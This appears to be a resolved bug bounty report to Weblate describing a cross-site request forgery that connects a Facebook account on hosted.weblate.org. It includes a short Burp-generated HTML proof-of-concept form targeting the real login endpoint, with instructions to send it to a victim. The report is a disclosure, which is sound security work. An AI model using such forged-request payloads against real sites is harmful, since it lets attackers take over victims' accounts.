CSRF to Connect third party Account
Medium
W
Weblate
Submitted None
Actions:
Reported by
idiablos
Vulnerability Details
Technical details and impact analysis
Hello Weblate Security Team,
I have found security vulnerability in your website :[ https://hosted.weblate.org
Vulnerable URL :- https://hosted.weblate.org/accounts/profile/#auth
Vulnerability :- CSRF to Connect FACEBOOK Account
CARF Code :- [save as [name].html and send it to victim
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://hosted.weblate.org/accounts/login/facebook/">
<input type="hidden" name="next" value="/accounts/profile/#auth" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Full Youtube Video POC :- https://youtu.be/tIVh8Pa5oWU
Expecting to prompt reply :)
Regards,
Pratik Panchal
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)